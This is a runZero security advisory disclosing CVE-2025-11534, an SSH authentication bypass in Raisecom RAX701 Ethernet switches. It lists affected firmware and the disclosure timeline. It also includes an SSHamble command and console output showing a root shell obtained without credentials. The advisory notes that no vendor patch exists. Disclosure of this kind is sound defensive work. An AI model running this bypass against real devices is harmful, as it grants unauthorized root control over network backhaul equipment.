Products
| Product | |
| 1 | Raisecom RAX series devices |
CVE
CVE-2025-11534Executive summary #
runZero has discovered an issue with Raisecom RAX701 devices, and is publishing this disclosure in accordance with runZeroâs standard disclosure policy today, October 21, 2025. CVE-2025-11534 has been assigned to this issue. Any questions about this disclosure should be directed to todb@runzero.com.
By skipping normal SSH authentication, a remote, unauthenticated attacker can gain control of Ethernet switches produced by Raisecom.
This issue is an instance of CWE-288, âAuthentication Bypass Using an Alternate Path or Channel,â and is estimated to have a CVSS 3.1 score of 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Technical details #
Raisecom produces Ethernet switches used to facilitate backhaul connections between ISPs and other businesses. Due to the way the device handles SSH authentication when connecting to either port 10022/TCP and 830/TCP (SSH and NETCONF SSH, respectively), an attacker can skip authentication and access the NETCONF service or the system root shell.
Affected Products #
This issue appears to affect the following devices:
- P200R002C53
- RAX701-GC-WP-01 P200R002C52
- RAX701-GC-WP-01 P200R002C53
Observed affected firmware versions include:
- 5.5.13_20180720
- 5.5.27_20190111
- 5.5.36_20190709
Example Attack #
This issue is most easily demonstrated by using the open source SSHamble research tool, using the command-line switches shown below.
./sshamble scan -L debug --interact=all -u root -p 10022,830 vuln.target.ip.addr
This results in skipping directly to the offered service, as shown in the lightly redacted console output, below.
time="1993-09-05 13:40:16" level=info msg="badkeys detection is not active, run `sshamble badkeys-update` to enable"
time="1993-09-05 13:40:22" level=debug msg="interaction enabled, starting stdin manager..."
time="1993-09-05 13:40:29" level=debug msg="vuln.target.ip.addr:10022 skip-ssh-userauth is running for user root"
time="1993-09-05 13:40:30" level=debug msg="vuln.target.ip.addr:830 is unreachable: dial tcp vuln.target.ip.addr:830: i/o timeout"
time="1993-09-05 13:40:31" level=info msg="scan processed 1 tasks in 10s"
time="1993-09-05 13:40:32" level=warning msg="vuln.target.ip.addr:10022 skip-ssh-userauth provided a session without ssh-userauth 'session': *******************************************************************\r\r\n * WARNING ! *\r\r\n * *\r\r\n * Access to this device is restricted to those individuals *\r\r\n * with specific Permission. *\r\r\n * *\r\r\n * UNAUTHORIZED ACCESS TO THIS DEVICE IS PROHIBITED *\r\r\n * *\r\r\n * You must have explicit, authorized permission to access or *\r\r\n * configure this device. Unauthorized attempts and actions *\r\r\n * to access or use this system may result in civil and/or *\r\r\n * criminal penalties. If you are not an authorized user, *\r\r\n * disconnect now. Any attempts to gain unauthorized access *\r\r\n * will be prosecuted to the fullest extent of the law. *\r\r\n *******************************************************************\r\r\n\r\r\n\r\r\n\r\r\n\r\r\n\r\r\n\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#show version\r\r\n\r\r\nProduct Version: RAX701-GC-WP-01 P200R002C53\r\r\nSoftware Version: 5.5.36_20190709\r\r\nRITP Version: 5.4\r\r\nBootstrap Version: BOOTROM_1.0.2\r\r\nFPGA Version: fpga:1.7 \r\r\nHardware Version: A.14\r\r\n\r\r\nSystem MacAddress: REDACTED\r\r\nSerial number: REDACTED\r\r\nRAX701-GC with\r\r\n128 M bytes DRAM\r\r\n32 M bytes Flash Memory\r\r\n2.631 M bytes Free Flash Memory\r\r\n\r\r\nSystem uptime is 2 days, 4 hours, 2 minutes\r\r\n\r\r\nRAX701#\r\r\nRAX701#"
time="1993-09-05 13:40:38" level=debug msg="vuln.target.ip.addr:10022 skip-ssh-userauth is running for user root"
sshamble> pty
sshamble> shell
time="1993-09-05 13:40:41" level=info msg="vuln.target.ip.addr:10022 session spawned a subprocess"
Interacting with session on vuln.target.ip.addr:10022
Enter the sshamble shell with `^E`. Commands:
exit - Exit the session (aliases 'quit' or '.')
help - Show this help text (alias '?')
env a=1 b=2 - Set the specified environment variables (-w for wait mode)
pty - Request a pty on the remote session (-w for wait mode)
shell - Request the default shell on the session
exec cmd arg1 arg2 - Request non-interactive command on the session
signal sig1 sig2 - Send one or more signals to the subprocess, case-sensitive:
ABRT,ALRM,FPE,HUP,ILL,INT,KILL,PIPE,QUIT,SEGV,TERM,USR1,USR2
tcp host port - Make a test connection to a TCP host and port
unix path - Make a test connection to a Unix stream socket
break milliseconds - Send a 'break' request to the service
req cmd arg1 arg2 - Send a custom SSH request to the service
sub subsystem - Request a specific subsystem
send string - Send string to the session
sendb string - Send string to the session one byte at a time
wait cmd arg1 arg2 - Send another command and wait for a reply
sleep duration - Sleep for the specified duration (1s, 100ms)
time="1993-09-05 13:40:42" level=info msg="waiting for session to complete..."
*******************************************************************
* WARNING ! *
* *
* Access to this device is restricted to those individuals *
* with specific Permission. *
* *
* UNAUTHORIZED ACCESS TO THIS DEVICE IS PROHIBITED *
* *
* You must have explicit, authorized permission to access or *
* configure this device. Unauthorized attempts and actions *
* to access or use this system may result in civil and/or *
* criminal penalties. If you are not an authorized user, *
* disconnect now. Any attempts to gain unauthorized access *
* will be prosecuted to the fullest extent of the law. *
*******************************************************************
RAX701#help
Raisecom software provides advanced help. Anytime when you need help,
please press '?' at the command line.
If nothing matches, the help list will be empty. You must backspace
your command until the available options are shown when entering
a '?'.
Two styles of help are provided by Raisecom:
1. Full help is available when entering a command followed by a
space and a '?'. Help of this style show all arguments and their
meanings to you. For example, by entering 'show ?', all arguments
of 'show' command are listed.
2. Partial help is provided when an argument's prefix immediately
followed by a '?' is entered. Help of this style show you all the
command's arguments that match the input prefix. For example, by
entering 'show m?', the arguments begin with 'm' are listed.
RAX701#quitAttacker value #
By skipping SSH authentication, anyone with access to ports 10022/TCP or 830/TCP on affected devices can claim a root shell or the NETCONF service (respectively). Doing so would give an attacker unusually potent control over backhaul Ethernet services facilitated by these devices, providing a platform for further attacks on affected networks.
Although CISA reached out to the vendor, Raisecom, we have been unable to confirm this issue with the vendor, and if other devices or firmware versions are affected. As far as weâre aware, no patch to fix this authentication issue has been provided provided by the vendor at the time of this disclosure.
Credit #
This issue was disclosed by runZero, was discovered by HD Moore. and disclosure was coordinated by Tod Beardsley and CISA.
Timeline #
- 2025-08-09 (Sat): Briefly demoed at DEF CON 33 in the presentation, Shaking Out Shells with SSHamble
- 2025-08-15 (Fri): PoC validated and this disclosure drafted
- 2025-08-19 (Tue): Disclosed to CISA as report VRF#25-08-QRYYL
- 2025-08-25 (Mon): CISA acknowledged as case VU#166934
- 2025-08-25 (Mon): CISA attempted contact with the vendor
- 2025-09-17 (Wed): More attempts to coordinate with the vendor
- 2025-10-21 (Tue): Public disclosure of CVE-2025-11534
